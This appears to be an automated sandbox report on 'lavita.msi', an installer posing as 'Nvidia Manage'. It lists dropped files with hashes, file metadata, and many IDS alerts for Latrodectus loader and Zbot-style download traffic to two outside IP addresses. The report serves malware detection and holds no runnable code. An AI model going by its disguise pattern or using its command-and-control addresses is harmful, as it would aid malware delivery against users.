                                                                                                                                Preview:...@IXOS.@.....@.^.Y.@.....@.....@.....@.....@.....@......&.{6526CBB4-D28A-4CBC-AF93-907FED1F0EB9}..Nvidia Manage..lavita.msi.@.....@..@..@.....@........&.{943AE3C8-CB21-42BD-93F4-79BEC1C03CE0}.....@.....@.....@.....@.......@.....@.....@.......@......Nvidia Manage......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}B.C:\Users\user\AppData\Roaming\Nvidia Manage INC\Nvidia Manage\.@.......@.....@.....@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}4.01:\Software\Nvidia Manage INC\Nvidia Manage\Version.@.......@.....@.....@......&.{D674043B-F548-4EAE-B311-F2B735308BAE}6.C:\Users\user\AppData\Roaming\gpuset\appgpuset.dll.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".B.C:\Users\user\AppData\Roaming\Nvidia Manage INC\Nvidia Manage\.@........InstallFiles..Copying new files&.File: [1], Di
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):1.1626304090275925
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:JSbX72FjoSAGiLIlHVRpth/7777777777777777777777777vDHF1GKppSl0i8Q:JRQI5pOyF
                                                                                                                                MD5:76ADF52004ECDE9DF40A9B8F54E18B23
                                                                                                                                SHA1:4A62DBC0335490FBD81030F534A6D76F986FA978
                                                                                                                                SHA-256:3704163FFA35F2316CD3A5527E3331B80E8D2E6E5DDD82F7AC4BA60CDC1D9FC4
                                                                                                                                SHA-512:FE842D788CED3ED4C5ADFD314EB5CA39CC11C60F3B57B420AE26DD8EDAA37E783016516F9EF7B69B1B7097555581AEEE965152A388ECEB687E4F1D11515E0656
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):1.5580068433685121
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:Z8PhUuRc06WXJanT5dtofjRSHfjvAEbCy8sBLfjRSHfjLT9:UhU1RnTjirRUrIwCBeLrRUrd
                                                                                                                                MD5:27ED7019F2F64FF1A492C8540EB13E2F
                                                                                                                                SHA1:D3716072E93BE7E3802B19E332EA85FC5778C42B
                                                                                                                                SHA-256:E7B907DFD9F2156272C4F1C25FD88847A8342593E6946AD2A7C9312582859F80
                                                                                                                                SHA-512:585FF7AC59820978654A8A8BA2D0477347C1C0864D98FAA85492736F7FE336CB720720035B8DAD1858C68D9BC6DDCA1A1331D3BF16B193DD8FE8316C3F6E8D1C
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):360001
                                                                                                                                Entropy (8bit):5.362994994579666
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgau/:zTtbmkExhMJCIpEm
                                                                                                                                MD5:D66847D2A3E0D8C409D192375A66A0A1
                                                                                                                                SHA1:365A8F9572DDB8EB21FCB379F3E2F61A5DB23FA6
                                                                                                                                SHA-256:9612F27159B9D2378E4E81707C86D3C03F4302413465AD26801BDDEF6A5E625A
                                                                                                                                SHA-512:ECD539789D6669F4A26C42303DE646662493E048509F82599861CC71B6C4841FEDDDCBFF5EABE54D01B2889FF4D75203B8BA67FE17918E0899A5B149F381C1CF
                                                                                                                                Malicious:false
                                                                                                                                Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):32768
                                                                                                                                Entropy (8bit):1.249671505576837
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:zvcuJM+CFXJpT59tofjRSHfjvAEbCy8sBLfjRSHfjLT9:jc3RTDirRUrIwCBeLrRUrd
                                                                                                                                MD5:1812435400E23EEBB74298F6C68954F0
                                                                                                                                SHA1:AAC8E63024884D3638D4B7C7CF904D113FC2B1D5
                                                                                                                                SHA-256:754793E25CB79107796793B252D145AF6AE37F6153D21B4AF614B04C52950A7B
                                                                                                                                SHA-512:8BCA391EB1AD770BE68D0BC5CE8469440EF1F7EAF8C5AC35CBE00C6DB2667DC90797D0451C60FAB1A1F77D441C19320D4B9DAAF98E037FE14DBE3738D259D468
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):512
                                                                                                                                Entropy (8bit):0.0
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3::
                                                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):73728
                                                                                                                                Entropy (8bit):0.13578752362456797
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:pHorTxksfjRipVksfj/ksfjRipVksfjvAEVkyjCy8sVgwGQ2q+6I:GrTLfjRSHfjVfjRSHfjvAEbCy8sBbt
                                                                                                                                MD5:9B301DD8617E14F2AC1DDE27ABD85DE5
                                                                                                                                SHA1:4D729299F16A808600E7C78BA1E32B10BA5771B2
                                                                                                                                SHA-256:3256A8899DACAB7DB9B6785DB72CD0E8549963F2F4C05AE9A024B701D3802388
                                                                                                                                SHA-512:27717F5C9CDDEA3F1074E4F5507125650F402716DE15F1F111A4D2FFBC0853F2C317B72BD33451C80CE6DC24C848AFAF9554F8BD4D5B7A69FA4F77EB34162812
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):32768
                                                                                                                                Entropy (8bit):1.249671505576837
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:zvcuJM+CFXJpT59tofjRSHfjvAEbCy8sBLfjRSHfjLT9:jc3RTDirRUrIwCBeLrRUrd
                                                                                                                                MD5:1812435400E23EEBB74298F6C68954F0
                                                                                                                                SHA1:AAC8E63024884D3638D4B7C7CF904D113FC2B1D5
                                                                                                                                SHA-256:754793E25CB79107796793B252D145AF6AE37F6153D21B4AF614B04C52950A7B
                                                                                                                                SHA-512:8BCA391EB1AD770BE68D0BC5CE8469440EF1F7EAF8C5AC35CBE00C6DB2667DC90797D0451C60FAB1A1F77D441C19320D4B9DAAF98E037FE14DBE3738D259D468
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):512
                                                                                                                                Entropy (8bit):0.0
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3::
                                                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):32768
                                                                                                                                Entropy (8bit):0.06939827639992935
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKO1TgZVhwIKBYtQVky6lS:2F0i8n0itFzDHF1GKIS
                                                                                                                                MD5:FC28DFFCEF979516818069E70E987E2F
                                                                                                                                SHA1:5D03D22CB808BC0D5E0241D7C15DFAB99D4325B7
                                                                                                                                SHA-256:0B975C634B3F45B20745117F512A391E2F889282D770C8B790027AECB5639206
                                                                                                                                SHA-512:B2B7DFD09199444594B413FF134BE2FE1961D5699138F47683D3649D9262741A02421A2BBCA8DA10211A4A6E767E7B1BC841A6156EDDC58044C9A5A07B053927
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):512
                                                                                                                                Entropy (8bit):0.0
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3::
                                                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):1.5580068433685121
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:Z8PhUuRc06WXJanT5dtofjRSHfjvAEbCy8sBLfjRSHfjLT9:UhU1RnTjirRUrIwCBeLrRUrd
                                                                                                                                MD5:27ED7019F2F64FF1A492C8540EB13E2F
                                                                                                                                SHA1:D3716072E93BE7E3802B19E332EA85FC5778C42B
                                                                                                                                SHA-256:E7B907DFD9F2156272C4F1C25FD88847A8342593E6946AD2A7C9312582859F80
                                                                                                                                SHA-512:585FF7AC59820978654A8A8BA2D0477347C1C0864D98FAA85492736F7FE336CB720720035B8DAD1858C68D9BC6DDCA1A1331D3BF16B193DD8FE8316C3F6E8D1C
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):32768
                                                                                                                                Entropy (8bit):1.249671505576837
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:zvcuJM+CFXJpT59tofjRSHfjvAEbCy8sBLfjRSHfjLT9:jc3RTDirRUrIwCBeLrRUrd
                                                                                                                                MD5:1812435400E23EEBB74298F6C68954F0
                                                                                                                                SHA1:AAC8E63024884D3638D4B7C7CF904D113FC2B1D5
                                                                                                                                SHA-256:754793E25CB79107796793B252D145AF6AE37F6153D21B4AF614B04C52950A7B
                                                                                                                                SHA-512:8BCA391EB1AD770BE68D0BC5CE8469440EF1F7EAF8C5AC35CBE00C6DB2667DC90797D0451C60FAB1A1F77D441C19320D4B9DAAF98E037FE14DBE3738D259D468
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):512
                                                                                                                                Entropy (8bit):0.0
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3::
                                                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                Malicious:false
                                                                                                                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {943AE3C8-CB21-42BD-93F4-79BEC1C03CE0}, Number of Words: 10, Subject: Nvidia Manage, Author: Nvidia Manage INC, Name of Creating Application: Nvidia Manage, Template: ;1033, Comments: Create database IInlimited, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                                                                Entropy (8bit):7.734482900935259
                                                                                                                                TrID:
                                                                                                                                • Windows SDK Setup Transform Script (63028/2) 47.91%
                                                                                                                                • Microsoft Windows Installer (60509/1) 46.00%
                                                                                                                                • Generic OLE2 / Multistream Compound File (8008/1) 6.09%
                                                                                                                                File name:lavita.msi
                                                                                                                                File size:2'416'640 bytes
                                                                                                                                MD5:b4d82d17669303be46edbf7b7c5823a2
                                                                                                                                SHA1:1d8e902129f1bfba8d349403b5d45a737d1372c3
                                                                                                                                SHA256:f071f083770fe89d0860ba0cf46eda960d3ccf31639a18dda8954a0c026165d9
                                                                                                                                SHA512:a97e93833d37c7e0d1f01a58a86cdc97dc8ab3cc2d7a0e458b158627ff61c625cddbbee8daaacbe9efae3f413afe5b605156c3a6803ef1a68fbfcd921a55dff6
                                                                                                                                SSDEEP:49152:XqfTYBZKumZr7A31su1uXZn8Ud9JCM5Rm5hfJYPYtwRXIhMRs:oYnK/AhuSyJN5RmjJvi4+
                                                                                                                                TLSH:2CB502223386C637C95E0270352A929B1178FDAB8B7140D7A3C9391EADB44D06A7DFD6
                                                                                                                                Icon Hash:2d2e3797b32b2b99
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-17T17:56:49.563810+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49935 | 172.67.161.60 | 443 | TCP
2024-12-17T17:56:49.586025+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 49935 | 172.67.161.60 | 443 | TCP
2024-12-17T17:56:52.748552+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49942 | 172.67.161.60 | 443 | TCP
2024-12-17T17:56:53.404984+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 49942 | 172.67.161.60 | 443 | TCP
2024-12-17T17:56:54.863333+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49947 | 172.67.161.60 | 443 | TCP
2024-12-17T17:56:55.607786+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 49947 | 172.67.161.60 | 443 | TCP
2024-12-17T17:56:58.125221+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49959 | 104.21.16.1 | 443 | TCP
2024-12-17T17:56:59.789799+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 49959 | 104.21.16.1 | 443 | TCP
2024-12-17T17:57:01.029378+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49965 | 104.21.16.1 | 443 | TCP
2024-12-17T17:57:05.181169+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49965 | 104.21.16.1 | 443 | TCP
2024-12-17T17:57:05.181169+0100 | 2018052 | ET MALWARE Zbot Generic URI/Header Struct .bin | 1 | 192.168.2.6 | 49965 | 104.21.16.1 | 443 | TCP
2024-12-17T17:57:06.421171+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49978 | 104.21.16.1 | 443 | TCP
2024-12-17T17:57:08.261240+0100 | 2018052 | ET MALWARE Zbot Generic URI/Header Struct .bin | 1 | 192.168.2.6 | 49978 | 104.21.16.1 | 443 | TCP
2024-12-17T17:57:09.487377+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49989 | 104.21.16.1 | 443 | TCP
2024-12-17T17:57:11.365156+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49989 | 104.21.16.1 | 443 | TCP
2024-12-17T17:57:11.365156+0100 | 2018052 | ET MALWARE Zbot Generic URI/Header Struct .bin | 1 | 192.168.2.6 | 49989 | 104.21.16.1 | 443 | TCP
2024-12-17T17:57:14.689327+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49998 | 104.21.16.1 | 443 | TCP
2024-12-17T17:57:17.376024+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 49998 | 104.21.16.1 | 443 | TCP
2024-12-17T17:57:18.678271+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49999 | 104.21.16.1 | 443 | TCP
2024-12-17T17:57:18.679141+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 49999 | 104.21.16.1 | 443 | TCP
2024-12-17T17:57:21.823230+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50000 | 104.21.16.1 | 443 | TCP
2024-12-17T17:57:23.487490+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50000 | 104.21.16.1 | 443 | TCP
2024-12-17T17:57:24.944663+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50001 | 104.21.16.1 | 443 | TCP
2024-12-17T17:57:26.587367+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50001 | 104.21.16.1 | 443 | TCP
2024-12-17T17:57:27.848882+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50002 | 104.21.16.1 | 443 | TCP
2024-12-17T17:57:27.849863+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50002 | 104.21.16.1 | 443 | TCP
2024-12-17T17:57:30.168446+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50003 | 104.21.16.1 | 443 | TCP
2024-12-17T17:57:31.564545+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50004 | 172.67.161.60 | 443 | TCP
2024-12-17T17:57:32.257828+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50004 | 172.67.161.60 | 443 | TCP
2024-12-17T17:57:33.615918+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50005 | 172.67.161.60 | 443 | TCP
2024-12-17T17:57:34.418190+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50005 | 172.67.161.60 | 443 | TCP
2024-12-17T17:57:35.715118+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50006 | 172.67.161.60 | 443 | TCP
2024-12-17T17:57:36.473410+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50006 | 172.67.161.60 | 443 | TCP
2024-12-17T17:57:38.189963+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50008 | 172.67.161.60 | 443 | TCP
2024-12-17T17:57:38.939717+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50008 | 172.67.161.60 | 443 | TCP
2024-12-17T17:57:40.750682+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50009 | 172.67.161.60 | 443 | TCP
2024-12-17T17:57:41.552541+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50009 | 172.67.161.60 | 443 | TCP
2024-12-17T17:57:43.037531+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50010 | 172.67.161.60 | 443 | TCP
2024-12-17T17:57:44.733327+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50010 | 172.67.161.60 | 443 | TCP
2024-12-17T17:57:46.529026+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50012 | 172.67.161.60 | 443 | TCP
2024-12-17T17:57:47.274049+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50012 | 172.67.161.60 | 443 | TCP
2024-12-17T17:57:48.788880+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50013 | 172.67.161.60 | 443 | TCP
2024-12-17T17:57:49.488222+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50013 | 172.67.161.60 | 443 | TCP
2024-12-17T17:57:51.457725+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50014 | 172.67.161.60 | 443 | TCP
2024-12-17T17:57:52.277311+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50014 | 172.67.161.60 | 443 | TCP
2024-12-17T17:57:53.713246+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50015 | 172.67.161.60 | 443 | TCP
2024-12-17T17:57:54.445432+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50015 | 172.67.161.60 | 443 | TCP
2024-12-17T17:57:55.760588+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50016 | 172.67.161.60 | 443 | TCP
2024-12-17T17:57:56.537150+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50016 | 172.67.161.60 | 443 | TCP
2024-12-17T17:57:58.333764+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50017 | 172.67.161.60 | 443 | TCP
2024-12-17T17:57:59.064652+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50017 | 172.67.161.60 | 443 | TCP
2024-12-17T17:58:00.526445+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50018 | 172.67.161.60 | 443 | TCP
2024-12-17T17:58:01.296382+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50018 | 172.67.161.60 | 443 | TCP
2024-12-17T17:58:03.112439+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50019 | 172.67.161.60 | 443 | TCP
2024-12-17T17:58:03.821780+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50019 | 172.67.161.60 | 443 | TCP
2024-12-17T17:58:05.374431+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50020 | 172.67.161.60 | 443 | TCP
2024-12-17T17:58:06.036318+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50020 | 172.67.161.60 | 443 | TCP
2024-12-17T17:58:07.419939+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50021 | 172.67.161.60 | 443 | TCP
2024-12-17T17:58:08.283056+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50021 | 172.67.161.60 | 443 | TCP
2024-12-17T17:58:09.748759+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50022 | 172.67.161.60 | 443 | TCP
2024-12-17T17:58:10.413734+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50022 | 172.67.161.60 | 443 | TCP
2024-12-17T17:58:11.694573+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50023 | 172.67.161.60 | 443 | TCP
2024-12-17T17:58:12.443428+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50023 | 172.67.161.60 | 443 | TCP
2024-12-17T17:58:13.796343+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50024 | 172.67.161.60 | 443 | TCP
2024-12-17T17:58:14.579130+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50024 | 172.67.161.60 | 443 | TCP
2024-12-17T17:58:16.504488+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50025 | 172.67.161.60 | 443 | TCP
                                                                                                                                2024-12-17T17:58:17.220446+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650025172.67.161.60443TCP
                                                                                                                                2024-12-17T17:58:18.688811+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650026172.67.161.60443TCP
                                                                                                                                2024-12-17T17:58:19.382849+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650026172.67.161.60443TCP
                                                                                                                                2024-12-17T17:58:21.286507+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650027172.67.161.60443TCP
                                                                                                                                2024-12-17T17:58:21.970889+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650027172.67.161.60443TCP
                                                                                                                                2024-12-17T17:58:23.377684+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650029172.67.161.60443TCP
                                                                                                                                2024-12-17T17:58:24.133335+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650029172.67.161.60443TCP
                                                                                                                                2024-12-17T17:58:25.642402+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650030172.67.161.60443TCP
                                                                                                                                2024-12-17T17:58:26.344275+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650030172.67.161.60443TCP
                                                                                                                                2024-12-17T17:58:27.665847+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650031172.67.161.60443TCP
                                                                                                                                2024-12-17T17:58:28.356736+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650031172.67.161.60443TCP
                                                                                                                                2024-12-17T17:58:29.693396+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650032172.67.161.60443TCP
                                                                                                                                2024-12-17T17:58:30.443624+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650032172.67.161.60443TCP
                                                                                                                                2024-12-17T17:58:31.746455+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650034172.67.161.60443TCP
                                                                                                                                2024-12-17T17:58:32.468728+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650034172.67.161.60443TCP
                                                                                                                                2024-12-17T17:58:34.435386+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650035172.67.161.60443TCP
